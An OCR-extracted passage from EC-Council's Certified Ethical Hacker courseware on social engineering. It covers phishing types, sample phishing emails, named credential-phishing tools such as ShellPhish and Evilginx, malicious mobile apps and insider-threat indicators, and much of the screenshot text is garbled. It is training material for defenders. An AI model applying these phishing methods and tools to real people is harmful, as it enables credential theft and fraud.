Source: https://www.liveaction.com OmniPeek Network Analyzer provides real-time visibility and expert analysis of each part of the target network. This tool will analyze, drill down, and fix performance bottlenecks across multiple network segments. Analytic plug-ins provide targeted visualization and search abilities within OmniPeek. The Google Maps plug-in enhances the analysis capabilities of OmniPeek. It displays a Google map in the OmniPeek capture window that shows the locations of all the public IP addresses of captured packets.

Attackers can use OmniPeek to monitor and analyze network traffic of the target network in real time, identify the source location of that traffic, and attempt to obtain sensitive information, as well as find any network loopholes. 2 omni Buffer usage: 0% Fiterstate:

[S¥~, Erterafter expression here une for heb)

Seaeonts pecs voce — 86co Capture

Accept all packets

e

ATID sath aaah adh ah Pa = Relative Tine Potocl pelle Destraton Packt) source (ERC ETT Dg fesersisisartife. Ey e.440251 TOPVE HDI? LRTSTOPVt |

al =a fies

3 Q Feber

4 @ fes0:

:15:sarfite.

1

:15:saeF: Fe.

178

1

Bonjot

90

1.533512 ICWPv6 NSoL

TEMP

94

1.760449 ICMPV6 MLDV2 LR

ToNPut

2.034218 ONS 2.105002 IGNP

Bonjot GHP

375

6g

web

4a fese::15:SaFF:Fe...

& wDNsvE

2

200

ran ‘weno avid

14 i FeBo::a5:5aeFite... iy mDNSVE 15 @ 10.10.1.14 Q 10"

1

78 6

one Calls

wnveda Peer crateMap statistics ‘Summary — palers pevkeatons aid

12 @ Fen0::6F09:F032:... al

8 7 packet Info racket Number @Scape orien @ Packet Length: Cleese SF Ethernet Tyoe 2 Destination WDee

@ Protocol Type:

BALL MLDV2-capabl.

(@.484933 ONS

-

=

2papers

Figure 9.3: Screenshot showing the phishing technique

Examples of Phishing Emails Source: https://cofense.com Today, most people use Internet banking. Many people use Internet banking for their financial needs such as online share trading and e-commerce. Phishing refers to the fraudulent acquisition of sensitive information such as passwords and credit-card details by masquerading as a trusted entity. The target receives an email that appears to be from the bank and requests the user to click on the URL or link provided. Today, even employees receive fraudulent phishing emails on security updates in their official email addresses. The victim is tricked into clicking on a malicious link in the email under the pretense of completing an update process. If the user is tricked and provides their username, password, and other information, then the site forwards the information to the attacker, who uses it for nefarious purposes.

Module09 Page 1354

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

File

Message

Developer

Exam 312-50 Certified Ethical Hacker

Help =

Tell me what you want to do

SY oie |eunc Deleteff Archive El) AssignBoMark Reply Reply Forward 6 nigrex ri

Respond

Gi

| rs

Delete

Posey Unread

Categorize Follow | Report

Tags

>

Upe | Phhing

5 Cofense

TT-PAYMENTCOPY 10587767 PDF "sale_automec@"

Ye: @1B@2olcom

com"
Forward ]

sm emy@ gmail.com>

Thuoa/10/2002

Dear Sir / Ma-am

‘We already transferred the money to your account. Kindly check and see attached files for your reference. Please also send us the necessary documents colored with signature and stamp (Invoice, Packing List, Certificate of Origin, Lead Free Certificate, Certificate of Analysis). Awaiting for your immediate action. = a

Figure 9.4: Screenshot showing a phishing email

File

Message

Help © Tell me what you want to do Be fe 1 B1& Boeing | ioe fi] El| BS Reply Reply Fomvard Ey ore» nk Delete Archive | Assign Mark Categorize Follow | Report

rs

Respond

Developer

Tamers

| Rinne

Delete

Poly” Unved

Tags

=

Up™ | Phishing il Cofense

Safety Account Information

Microsoft Account

teow | © tepyat | > foward | [+]

Te, @redated@insurance

Te 0/22/2022

Security info update Dear User,

‘Your email account has to be updated to avoid deactivation or Risk of theft. So we strongly recommend that you should immediately verify your

email account.

CLICK TO VERIFY

WARNING! Protect your privacy. Log-out when you are done and completely exit your browse. Privacy | Legal Figure 9.5: Screenshot showing a phishing email

Module 09 Page 1355

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Bom BE ES a

Exam 312-50 Certified Ethical Hacker

&

BM) |S e |or cam

semeLoan: 9820040018 -Secure: Pre CD / ALTA / Wire Inst and Other Closing Docs Attached

com’ Fomers

com>

New iliniisme: Secure email message from imal lillie

Open Message ‘To view the secure message, click Open Message. ‘The secure message expires on Sep 30, 2022 @ 04:01 PM (GMT). Do not reply to this notification message; this message was auto-generated by the sender's security system. To reply to the sender, click Open Message. If clicking Open Message does not work, copy and paste the link below into your Intemet browser address bar. ‘com.br/ed/Portal nttosif Want to send and receive your secure messages transparently? Click here to learn more. Be aware! Online banking fraud is on the rise. If you receive an email containing WIRE INSTRUCTIONS call your Escrow Officer immediately to verify the information prior to sending funds.

. Le

SF siesoe |!

Weatherford7 Drive, omce Mabie: Fax:

Suite 100

Email: [email protected] Department of insurance: Escrow License

CALL BEFORE YOU WIRE

Figure 9.6: Screenshot showing a phishing email

Types of Phishing =

Spear Phishing

Instead of sending out thousands of emails, some attackers opt for “spear phishing” and use specialized social engineering content directed at a specific employee or small group of employees in an organization to steal sensitive data such as financial information and trade secrets. Module 09 Page 1356

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Spear phishing messages seem to come from a trusted source with an official-looking website. The email also appears to be from an individual from the recipient's company, generally someone in a position of authority. In reality, the message is sent by an attacker attempting to obtain critical information about a specific recipient and their organization, such as login credentials, credit card details, bank account numbers, passwords, confidential documents, financial information, and trade secrets. Spear phishing generates a higher response rate compared to a normal phishing attack, as it appears to be from a trusted company source.

=

Whaling A whaling attack is a type of phishing that targets high profile executives like CEO, CFO, politicians, and celebrities who have complete access to confidential and highly valuable information. It is a social engineering trick in which the attacker tricks the victim into revealing critical corporate and personal information (like bank account details, employee details, customer information, and credit card details), generally, through email or website spoofing. Whaling is different from a normal phishing attack; the email or website used for the attack is carefully designed, usually targeting someone in the executive leadership.

=

Pharming Pharming is a social engineering technique in which the attacker programs on a victim’s computer or server, and when the victim domain name, it automatically redirects the victim’s traffic to an website. This attack is also known as “Phishing without a Lure.” confidential information like credentials, banking details, and other to web-based services. Pharming attack can be performed Modification

in two ways:

DNS

Cache

executes malicious enters any URL or attacker-controlled The attacker steals information related

Poisoning and

Host File

DNS Cache Poisoning: o

The attacker performs DNS Cache Poisoning on the targeted DNS server.

o

The attacker modifies the IP address of the target website “www.targetwebsite.com” to that of a fake website “www.hackerwebsite.com.”

o

When the victim enters the target website’s URL in the browser's address bar, a request is sent to the DNS server to obtain the IP address of the target website.

o

The DNS server returns a fake IP address that is already modified by the attacker.

©.

Finally, the victim is redirected to the fake website.

Host File Modification: o

Anattacker sends a malicious code as an email attachment.

o

When the user clicks on the attachment, the code executes and modifies local host files on the user’s computer.

Module 09 Page 1357

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering o

When

Exam 312-50 Certified Ethical Hacker

the victim enters the target website’s

compromised host file automatically website controlled by the hacker.

URL in the browsers address

bar, the

redirects the user’s traffic to the fraudulent

Pharming attacks can also be performed using malware like Trojan horses or worms. =

Spimming SPIM (Spam over Instant Messaging) exploits Instant Messaging platforms and uses IM as a tool to spread spam. A person who generates spam over IM is called Spimmer. Spimmers generally make use of bots (an application that executes automated tasks over the network) to harvest Instant Message IDs and forward spam messages to them. SPIM messages, like email spam, generally include advertisements and malware as an attachment or embedded hyperlink. The user clicks the attachment and is redirected to a malicious website that collects financial and personal information like credentials, bank account, and credit card details.

=

Angler Phishing Angler phishing is a cyber phishing fraud in which attackers target disgruntled users or customers over social media platforms. Attackers perform this attack by creating a fake social media account impersonating the organization’s helpdesk account and connecting to the disgruntled individuals via social media posts. They may reply to individuals who raise complaints on social media or post fake service links. Users assume that they have received feedback from a trusted source and access the malicious link posted by the attackers. When victims click on the link, malicious software is installed on their system, or they are redirected to another site requesting them to provide their details. This technique further encourages attackers to gain critical information such as individuals’ biodata or account information for monetary benefits.

=

Catfishing Attack A catfishing attack is an online phishing scam in which attackers target social media platforms (Facebook, Instagram, etc.) and perform identity stealing the target profile’s identity, attackers create a fake social media masquerade as the owner of the account. Then, attackers use that communicating with other users online via chat boxes or other means personal or business relationships. Later, they perform cyberbullying or engineering attempts for monetary gain.

a person on theft. After account and account for to establish other social

Signs of Catfishing o

Avoids

direct communication:

A catfisher often

provide their contact number, avoids emergency excuses of illness or travel.

©

turning

avoids direct meetings,

on

their

webcam,

refuses to

and

makes

Maintains a single profile picture for a long duration: A catfisher maintains the same profile picture for years to falsify their age. Occasionally, attacker may download all the pictures of the victim at once and use them one by one for years to falsify their age.

Module 09 Page 1358

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

=

Exam 312-50 Certified Ethical Hacker

o

Maintains a good number of friends in their account: A catfisher maintains number of friends of the opposite gender in their account.

a good

o

Requests for Money: A catfisher often requests money while pretending to be in danger. They attempt to leverage the emotional or business-oriented attachments of users.

Deepfake Attack A deepfake attack is a type of phishing attack in which attackers create false media of a person they target using advanced technologies such as ML and Al. Attackers mimic a person who is in a senior position and create falsified media with high accuracy (face, voice, video, and movements) to avoid suspicion by the end users. Attackers perform deepfakes by gathering previously recorded audio and video samples of the target person and then cloning those clips. Deepfake phishing attacks can be performed in any form and may include ghost fraud (using an expired person’s narratives or clippings), application fraud (a stolen online account’s clippings), and synthetic identity fraud (clips with unknown identity). All these deepfake attempts are made to deceive online users into believing that they are listening to original clippings, which often request donations. Further, using these fake clippings, attackers may blackmail victims into paying a

ransom.

Signs of a Deepfake Attack o

o

Audio signs ¢

Deviation from a natural speech pattern

¢

Robotic voice toning

e

Poor audio quality

Video signs ¢

Mismatch between speech and lip movement

e

Uneven blinking or eye movements

e

Frequent color changes in skin tone

Module 09 Page 1359

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Phishing Tools ShellPhish

|

CEH

ShellPhish isa phishing tool used to phish user credentials from various social networking platforms such as Instagram, Facebook, Twitter,

Linkedin, etc.

BLACKEYE

&

tetp://athatscom Phishx ttps://othutscom

=D et |

Modlishka ttps://othub.com

i https:/athub.com

FE

Copyright © by

FP)

Evilginx

sectantcon Al Rights Reserved. Reproduction i

Phishing Tools Phishing tools can be used by attackers to generate fake login pages to capture usernames and passwords, send spoofed emails, and obtain the victim’s IP address and session cookies. This information can further be used by the attacker, who will use it to impersonate a legitimate user and launch further attacks on the target organization.

=

ShellPhish Source: https://github.com ShellPhish is a phishing tool used to phish user credentials from various social networking platforms such as Instagram, Facebook, Twitter, and LinkedIn. It also displays the victim system’s public IP address, browser information, hostname, geolocation, and other information.

Module 09 Page 1360

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Instagr be napchat Twitter Github Google

Origin Steam Yahoo Linkedin Protonmail Wordpress

potify Netflix

Gitlab Pintere: Custom Exit

Microsoft

Victim IP: User-Agent:

Waiting

Next

IP and Next

Credentials,

P

Ctrl

+ C to exit...

Figure 9.8: Screenshot showing the output of ShellPhish Module 09 Page 1361

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Some additional phishing tools are listed below:

=

BLACKEYE (https://github.com)

=

PhishX (https://github.com)

=

Modlishka (https://github.com)

=

Trape (https://github.com)

=

Evilginx (https://github.com)

Module 09 Page 1362

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Mobile-based Social Engineering: Publishing Malicious Apps and Repackaging Legitimate Apps Publishing Malicious Apps @ Attackers create malicious apps with attractive features and similar names to popular apps, and publish them in major

Repackaging Legitimate Apps

app stores

Developer creates

2 gaming uploads on appapp and store

{@ Users download these apps unknowingly and are infected

by malware that sends credentials to attackers

Qe

creates malicious mobile lation

Attacker

(2)

H

>

Malicious Gaming

ry

ef ;

stacker publishes malicious ‘mobile apps on ep store

App Store

Application

2)

User downloads and

installs the malcous mobile spltion

cE H Pood beatla

Malicious developer downloads a legitimate game

=. Store

and repeciagesitwith matware >

Qos

oo

= Developer A

3)

Uploads game tothird-party

4

app store

Legit gitimate

Developer

e

Third-Party ‘App Store Mobile-based Social Engineering: Fake Security Applications and SMiShing (SMS Phishing) Fake Security Applications Userlogs on totheir bank account; a message will appear telling the userto download an application to their phone infects PC with malware tothe attacker

‘Attacker uploads malicious application ‘on app store

User downloads application from the attacker's app store

Ey)

cE H ol

SMiShing (SMS Phishing) @ SMiShing (SMS phishing) is the act of using SMS text i " mobile other or phones cellular of system messaging

devices to lure users into instant action, such as downloading malware, visiting a malicious webpage, or calling a fraudulent phone number

Sends an SMS

Thinks it isa real message from XIM bank = ‘Tracy calls 08-7999-433,

‘Arecording asks herto provide her creditor debit card number. Tracy reveals sensitive information

Attacker’s App Store

Mobile-based Social Engineering Publishing Malicious Apps In mobile-based social engineering, the attacker performs a social engineering attack using malicious mobile apps. The attacker first creates the malicious application — such as a gaming app with attractive features — and publishes it on major application stores using the popular names. Unaware of the malicious application, a user will download it onto their mobile device, Module 09 Page 1363

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Social Engineering

believing it to be genuine. Once the application is installed, the device is infected by malware that sends the user’s credentials (usernames, passwords), contact details, and other information to the attacker.

1)

Creates malicious mobile

application seeceeseees oS

Attacker publishes malicious mobile apps on

app store @ seeeetersenens > App Store =

Malicious Gaming Application

Attacker A

User downloads and !

E App sends user

installs the malicious : mobile application :

} credentials to the attacker

Figure 9.9: Publishing malicious apps

Repackaging Legitimate Apps Sometimes malware can be hidden within legitimate apps. A legitimate developer creates legitimate gaming applications. Platform vendors create centralized marketplaces to allow mobile users to conveniently browse and install these games and apps. Usually, developers submit gaming applications to these marketplaces, making them available to thousands of mobile users. A malicious developer downloads a legitimate game, repackages it with malware, and uploads it to the third-party application store. Once a user downloads the malicious application, the malicious program installed on the user’s mobile device collects the user’s information and sends it to the attacker. Developer creates a gaming app and

e

a

aid

2

Mobile App

Store

Malicious developer downloads a legitimate game

é

Sends user credentials to the malicious developer

#1

Malicious

Developer

Uploads game to third-party app store

Legitimate Developer

e fk

End user downloads (4)

malicious gaming app

User

Third-Party App Store

Figure 9.10: Repackaging legitimate apps

Module 09 Page 1364

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Fake Security Applications Attackers may send a fake security application to perform mobile-based social engineering. In this attack, the attacker first infects the victim’s computer by sending something malicious. They then upload a malicious application to an app store. When the victim logs on to their bank account, malware in the system displays a pop-up message telling the victim that they need to download an application on their phone to receive a message from security. The victim downloads the application from the attacker's app store, believing they are downloading a genuine app. Once the user downloads the application, the attacker obtains confidential information such as bank account login credentials (username and password), whereupon a second authentication is sent by the bank to the victim via SMS. Using that information, the attacker accesses the victim’s bank account.

User logs on to their bank account; a message will appear telling the userto download an

application to their phone

Infects user

PC with malware User credentials sent

Attacker

to the attacker

= Attacker uploads

User download:

malicious application

application from th

‘on app store

attacker’s app stor

Attacker’s App Store Figure 9.11: Fake security applications

SMiShing (SMS Phishing) Sending SMS is another technique used by attackers in performing mobile-based social engineering. In SMiShing (SMS Phishing), the SMS text messaging system is used to lure users into taking instant action such as downloading malware, visiting a malicious webpage, or calling a fraudulent phone number. SMiShing messages are crafted to provoke an instant action from the victim, requiring them to divulge their personal information and account details. Consider Tracy, a software engineer working in a reputed company. She receives an SMS ostensibly from the security department of XIM Bank. It claims to be urgent, and the message says that Tracy should call the phone number listed in the SMS immediately. Worried, she calls to check on her account, believing it to be an authentic XIM Bank customer service phone

Module 09 Page 1365

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

number. A recorded message asks her to provide her credit or debit card number, as well as her password. Tracy believes it is a genuine message and shares sensitive information. Sometimes a message claims that the user has won money or has been randomly selected as a lucky winner and that they merely need to pay a nominal fee and share their email address, contact number, or other information. Thinks it is a real

Sends an SMS

>

XIM BANK

Emergency!

message from

XIM bank

Please call

08-7999.433

——f Tracy calls

08-7999-433

A recording asks her to provide

her credit or debit card

number. Tracy reveals sensitive information Figure 9.12: SMiShing (SMS Phishing)

Module 09 Page 1366

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

C/EH

LO#03: Summarize Insider Threats

Al Rights Reserved. Reproduction is Stricty Prohibited

Insider Threats/Insider Attacks ‘@ Aninsider is any employee (trusted person or people) with

access to critical assets of the organization

@ An insider attack involves using privileged access to intentionally violate rules or cause threats of any form to the organization's information or information systems |@ Such attacks are generally performed by privileged users,

disgruntled employees, terminated employees, accident-prone

employees, third parties, undertrained staff, etc.

Reasons for Insider Attacks

CE H Insider Threat Statistics

According to insider threat statistics for 2022, a majority of

companies agree that privileged users, administrators, and

| C\evel executivesare the most dangerous insider threat actors

3

80

F3

5 60

© Financial gain

2

© Theft of confidential data @ Revenge

3 40

© Becoming a future competitor

. a competitor . © Helping

© Public announcement

Top Insider Threat Actors

3 goo é

o

‘Managers

Contractors and

Consultants

Regular

Employees tts: financesantine.com

Insider Threats An insider is any employee (trusted person) who has access to the critical assets of an organization. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. Insider

Module 09 Page 1367

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering attacks may cause great loss to the company. easy to launch and difficult to detect.

Exam 312-50 Certified Ethical Hacker Further, they are dangerous

because they are

Insider attacks are generally performed by: Privileged Users: Attacks may come from the most trusted employees of the company, such as managers and system administrators, who have access to the company’s confidential data and a higher probability of misusing the data, either intentionally or unintentionally. Disgruntled Employees: Attacks may come from unhappy employees or contract workers. Disgruntled employees, who intend to take revenge on the company, first acquire information and then wait for the right time to compromise the organization’s

resources.

Terminated Employees: Some employees take valuable information about the company with them when terminated. These employees access the company’s data after termination using backdoors, malware, or their old credentials if they are not disabled. Accident-Prone Employees: If an employee accidentally loses their mobile device, sends an email to incorrect recipients, or leaves a system loaded with confidential data loggedin, it can lead to unintentional data disclosure. Third Parties: Third parties, like remote employees, partners, dealers, and vendors, have access to the company’s information. However, the security of their systems is unpredictable and could be a source of information leaks.

Undertrained Staff: A trusted employee becomes an unintentional insider due to a lack of cybersecurity training. They fail to adhere to cybersecurity policies, procedures, guidelines, and best practices. Companies in which insider attacks are common include credit card companies, health-care companies, network service providers, as well as financial and exchange service providers. Reasons for Insider Attacks Financial Gain An attacker performs an insider attack mainly for financial gain. The insider sells the company’s sensitive information to its competitor, steals a colleague’s financial details for personal use, or manipulates the company’s financial records or that of its personnel.

Steal Confidential Data A competitor may inflict damage upon the target organization, steal critical information, or even put them out of business just by finding a job opening, preparing someone to get through the interview, and having that person hired by the competitor.

Module 09 Page 1368

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Revenge It only takes one disgruntled person to seek revenge, and the company is compromised. Attacks may come from unhappy employees or contract workers with negative opinions about the company. Become Future Competitor

Current employees may plan to start their own competing business and, by using the company’s confidential data, these employees may access the system to steal or alter the company’s client list. Perform Competitors Bidding

Due to corporate espionage, even the most honest and trustworthy employees can be coerced into revealing the company’s critical information through bribery or blackmail. Public Announcement

A disgruntled employee may want to make a political or social statement and so leaks or damages the company’s confidential data. Insider Threat Statistics Source: https://financesonline.com According to insider threat statistics for 2022, a majority of companies agree that privileged users, administrators, and C-level executives are the most dangerous insider threat actors with fraud and financial gains as the main motivation.

[—}

co)

Percentage of Insider Threats

°

oo

Top Insider Threat Actors

Managers

Contractors and Consultants

Regular Employees

Figure 9.13: Graph showing insider threat statistics

Module 09 Page 1369

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Types of Insider Threats

CE H

-

A disgruntled or terminated employee who steals dataor destroys

sider

the corporate network

Malicious

‘i Negligent Insider js Professional Insider

Compromised Insider

Accidental Insider

.

the company’s networks intentionally by introducing malware into

Insiders who are uneducatedon potential security threatsor who °simply bypassgeneral ‘ security procedures to meet workplace i efficiency Harmful insiders whouse their technical knowledgeto identify

weaknessesand vulnerabilities in the company’s network and sell confidential information to competitors or black market bidders

who is An insider with access to critical assets ofan organization compromised by an outside threat actor

Inadvertent exposure of data toan external entityby mistypingan email address, sendinga valuable business documentto an unknown user, or unintentionally clicking on a malicious hyperlink

Why are Insider

Attacks Effective?

@ Easy to launch @ Prevention is difficult © Succeed easily ©

Employees can easily cover

their tracks

© Differentiating harmful actions from the employee's regular work is very difficult

© Cango undetected for years and remediation is very expensive

Types of Insider Threats There are four types of insider threats. They are:

Malicious Insider Malicious insider threats come from disgruntled or terminated employees who steal data or destroy company networks intentionally by injecting malware into the corporate network. Negligent Insider Insiders, who are uneducated on potential security threats or simply bypass general security procedures to meet workplace efficiency, are more vulnerable to social engineering attacks. Many insider attacks result from employee’s laxity towards security measures, policies, and practices. Professional Insider Professional insiders are the most harmful insiders. They use their technical knowledge to identify weaknesses and vulnerabilities in the company’s network and sell the organization’s confidential information to competitors or black-market bidders. Compromised Insider

An outsider compromises an insider who has access to the critical assets or computing devices of an organization. This type of threat is more difficult to detect since the outsider masquerades as a genuine insider.

Module 09 Page 1370

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering =

Exam 312-50 Certified Ethical Hacker

Accidental Insider Accidental insider threats occur from the inadvertent exposure of confidential details to an external entity. Mistyping an email address, sending a valuable business document to an unknown user, unintentionally clicking on a malicious hyperlink, downloading a virusinfected file in a phishing email, and inadvertently disposing important papers are a few examples of accidental insider threats.

Why are Insider Attacks Effective? Insider attacks are effective because: =

Insider attacks can go undetected for years, and remediation is expensive.

=

Insider attacks are easy to launch.

=

Preventing insider attacks is difficult; an inside attacker can easily succeed

=

It is very difficult to differentiate harmful actions from the employee’s regular work. It is hard to identify whether employees are performing malicious activities or not.

=

Even after malicious activity is detected, responsibility and claim it was a mistake.

=

It is easy for employees to cover their actions by editing or deleting logs to hide their malicious activities.

the

employee

may

refuse

to

accept

Example of Insider Attack: Disgruntled Employee Most cases of insider abuse can be traced to individuals who are introverts, incapable of managing stress, experiencing conflict with management, frustrated with their job or office politics, craving respect or promotion, transferred, demoted, or issued an employment

termination notice, among other reasons. Disgruntled employees may pass company secrets and intellectual property to competitors for monetary gain, thus harming the organization.

Disgruntled employees can use steganography programs to hide company secrets and later send the information to competitors as an innocuous-looking message such as a picture, image, or sound file using a work email account. No one suspects them because the attacker hides the stolen sensitive information in the picture or image file. A

TF. S

Disgruntled Employee

_—

Sends the data to competitors

. Company’s Secrets

using steganography

Company Network

>



a

ee

¥

Competitors

Figure 9.14: Example of Insider Attack — Disgruntled Employee

Module 09 Page 1371

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Behavioral Indications of an Insider Threat

if EH

fa | Data exfiltration alerts

oi

Unauthorized downloading or copying of sensitive data

Ei

missing or modified network logs

EBD

bozeing of different user accounts from different systems

EB

changesin network usage patterns

FEI temporatchanges in revenue or expenditure

Eh

muttipte faited iogin attempts

FER unauthorized access to physical assets

EE

behavioral and temperament changes

EEG increaseor decreasein productivity of employee

EE

vnusuai time and location of access

EE

Ei

missingor modified critical data

EEA unusual business activities

inconsistent workinghours

served. Reproduction

Behavioral Indications of an Insider Threat Indicators of insider threats are generally abnormal user activities that deviate from regular work activities. These represent unusual patterns of user behavior that require further analysis to identify malicious motives and intents. The most common indicator of insider threat is a lack of employee awareness about security measures. The following are various behavioral indicators of insider threats: =

Alerts of Data Exfiltration Alerts of the unauthorized gathering and transmission of data on the network can represent an insider or malware attack. Insiders can also use paper, fax machines, hard drives, portable devices, and other computing equipment to gather and transfer sensitive data.

=

Missing or Modified Network Logs Insiders try to access the log files to delete, modify, and edit unauthorized access events, file transfer logs, and other records from systems and network devices to avoid detection. Alerts of log modification, deletion, or access can indicate attacks.

=

Changes in Network Usage Patterns Changes in the network patterns of the network-specific protocols, size of the packets, sources and destinations, frequency of user application sessions, and bandwidth usage can indicate malicious activity.

Module 09 Page 1372

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering =

Exam 312-50 Certified Ethical Hacker

Multiple Failed Login Attempts The insider can try to log in to unauthorized systems or applications by brute-force. So, multiple failed attempts may indicate an insider threat.

=

Behavioral and Temporal Changes Deviation from established behavior and temporal changes in employee behavior such as spending capacity, frequent travel, anger management issues, constant quarrels with colleagues, and lethargy in performing work are some of the fraud indicators.

=

Unusual Time and Location of Access Any mismatch in the timeline of an event can be suspicious and may indicate an insider threat. For example, if activities are logged on employee systems in their absence.

=

Missing or Modified Critical Data Disgruntled employees can modify or delete sensitive data to damage the reputation of the organization.

=

Unauthorized Download or Copying of Sensitive Data Insiders use legitimate and malicious tools to extract data from the organization’s perimeter. Insiders can install malware, trojans, and backdoors to steal information.

=

Sending Sensitive Information to Personal Email Account Insiders may send critical organizational information to their personal email accounts with malicious intent.

=

Logging of Different User Accounts from Different Systems Unusual times of access combined with a change in the IP address of the system used to log into the account may represent malicious activities.

=

Temporal Changes in Revenue or Expenditure Unexpected and unexplained changes in the financial status of an employee signify an income generated from external sources. The organization should audit their financial reports to identify whether the employee was involved in any malicious activities.

=

Unauthorized Access to Physical Assets Activities such as employees using authorized assets without authentication, trying to escalate their privileges beyond their job requirements, or trying to gain physical access to the assets can represent a threat.

=

Increase or Decrease in Productivity of Employee Employees who are unproductive, threatening, have legitimate or illegitimate job concerns, and disagree with intellectual property rights tend to be suspicious. A sudden increase or decrease in their productivity can signify suspicious behavior.

Module 09 Page 1373

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering =

Exam 312-50 Certified Ethical Hacker

Inconsistent Working Hours, Unusual Business Activities, and Concealed or Frequent Foreign Trips Employees with suspicious business activities like unusual login times, unusual office hours, unauthorized browsing and downloads, concealed trips abroad, and meetings with representatives from other countries or organizations may pose a threat to the organization.

=

Extreme Behavior Due to Mental Instability Some employees possess unpredictable and extreme behavior, such as kleptomania, and a sudden change in behavior may be due to mental instability. This raises the probability that they will perform financial fraud, data theft, or physical theft.

=

Signs of vulnerability (Such as Drug or Alcohol Abuse, Financial Difficulties, Gambling, Illegal Activities) Employees with bad habits such as drugs, gambling, and alcohol abuse, and relationship issues, may take a chance to breach the organization’s data for money. Organizations must regularly monitor the activities of such employees.

=

Complaint on Sensitive Data Leak Information or complaints regarding sensitive data leaks can represent an insider attack. Check for customer reviews and concerns to identify anomalies and analyze them to identify the insider.

=

Abnormal Access of Systems and User Accounts The mismatch between the systems assigned systems may indicate an insider threat.

=

and

used to access the

Irresponsible Social Media Behavior Insiders may attempt to create a negative impact unnecessary information on social media websites.

=

user accounts

on

the

organization

by

posting

Attempt to Access Restricted Zones Employees with malicious intent may try to access restricted areas of the organization to collect sensitive information.

Module 09 Page 1374

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

CEH

LO#04: Explain Impersonation on Social Networking Sites

Impersonation on Social Networking Sites Today social networking sites are widely used by many people that allow them to build online profiles, share information and media such as pictures, blog entries, and music clips. Thus, it is relatively easier for an attacker to impersonate someone. The victim is likely to trust the attacker and eventually reveal information that would help them gain access to the system. This section describes how attackers perform social engineering through impersonation using various social networking sites such as Facebook, LinkedIn, and Twitter, and highlights the risks these sites pose to corporate networks.

Module 09 Page 1375

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Social Engineering through Impersonation on Social Networking Sites

cE H |

@ Malicious users gather confidential information from social networkingsites and create accounts using another person’s name ‘@ Attackers use these fraudulent profilesto create large

Organization Details

Professional Details Contacts and Connections

Personal Details

rv|:3]

networksof friendsand extract information using social

engineeringtechniques 8 igtecnniq Attackers

attempt to join the target

organization’s employee prtos B e t Org: ons isshared employ groups where personal and company information

@ Attackers may can also use collected information to carry out other forms of social engineering attacks

Social Engineering through Impersonation on Social Networking Sites As social networking sites such as Facebook, Twitter, and Linkedin are widely used, attackers coopt them as a vehicle for impersonation. There are two ways an attacker can perform impersonation on social networking sites:

=

By creating a fictitious profile of the victim on the social media site

=

By stealing the victim’s password or indirectly gaining access to the victim’s social media

account

